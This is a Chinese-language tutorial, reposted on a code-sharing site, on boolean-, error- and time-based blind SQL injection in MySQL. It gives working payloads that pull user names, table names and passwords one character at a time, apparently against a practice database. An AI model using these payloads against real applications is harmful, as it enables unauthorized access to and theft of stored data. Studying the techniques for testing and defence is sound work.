ICode9
精准搜索请尝试: 精确搜索
首页
编程语言>
数据库
系统相关
互联网
其他分享
Python
Java
JavaScript
android
PHP
首页 > 数据库> 文章详细

SQL注入--盲注

2021-07-27 11:02:11  阅读:222  来源: 互联网

标签:-- 盲注 substr SQL regexp ascii select


概述:

  何为盲注?盲注就是在sql注入过程中,sql语句执行的选择后,选择的数据不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。

  •基于布尔SQL盲注

  •基于时间的SQL盲注

  •基于报错的SQL盲注

 

1:基于布尔SQL盲注----------构造逻辑判断

  • 三大法宝:mid(),substr(),left()

     mid(string,start,length)          //mid(a,b,c)从位置b开始,截取a字符串的c位

     string substr(string, start, length)    //substr(a,b,c)从b位置开始,截取字符串a的c长度。

     left ( string, n )    //left(a,b)从左侧截取a的前b位

    注:Ord()函数同ascii(),将字符转为ascii值.

      ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))>98%23              

       //ORD()函数,MID()函数,:mid(a,b,c)从位置b开始,截取a字符串的c位,Ord()函数同ascii(),将字符转为ascii值  

      ascii(substr((select table_name information_schema.tables where tables_schema=database()limit 0,1),1,1))=101 --+

      //substr()函数,ascii()函数:substr(a,b,c)从b位置开始,截取字符串a的c长度。Ascii()将某个字符转换为ascii值

  • regexp正则注入

  select user() regexp '^[a-z]'    //正则表达式的用法,user()结果为root,regexp为匹配root的正则表达式:select user() regexp '^ro'.当正确的时候显示结果为1,不正确的时候显示结果为0.

select * from users where id=1 and 1=(if((user() regexp '^r'),1,0));
select * from users where id=1 and 1=(user() regexp'^ri');
select * from users where id=1 and 1=(select 1 from information_schema.tables where table_schema='security' and table_name regexp '^us[a-z]' limit 0,1);
  • like匹配注入

  select user() like 'ro%'

  

 

2:基于报错的SQL盲注------构造payload让信息通过错误提示回显出来

 

Select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a;

  此处有三个点,一是需要concat计数,二是floor,取得0 or 1,进行数据的重复,三是group by进行分组,但具体原理解释不是很通,大致原理为分组后数据计数时重复造成的错误。也有解释为mysql 的bug 的问题。但是此处需要将rand(0),rand()需要多试几次才行。

  • 可以简化为
select count(*) from information_schema.tables group by concat(version(),floor(rand(0)*2))
  • 如果关键的表被禁用了,可以使用这种形式
select count(*) from (select 1 union select null union select !1) group by concat(version(),floor(rand(0)*2))
  • 如果rand被禁用了可以使用用户变量来报错
select min(@a:=1) from information_schema.tables group by concat(password,@a:=(@a+1)%2)

3:基于时间的SQL盲注----------延时注入

If(ascii(substr(database(),1,1))>115,0,sleep(5))%23      //if判断语句,条件为假,执行sleep
UNION SELECT IF(SUBSTRING(current,1,1)=CHAR(119),BENCHMARK(5000000,ENCODE('MSG','by 5 seconds')),null) FROM (select database() as current) as tb1;
//BENCHMARK(count,expr)用于测试函数的性能,参数一为次数,二为要执行的表达式。可以让函数执行若干次,返回结果比平时要长,通过时间长短的变化,判断语句是否执行成功。这是一种边信道攻击,在运行过程中占用大量的cpu资源。推荐使用sleep()

函数进行注入。

 

标签:--,盲注,substr,SQL,regexp,ascii,select
来源: https://www.cnblogs.com/GGany/p/15064708.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

关于我们 | 联系我们 | 留言反馈

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有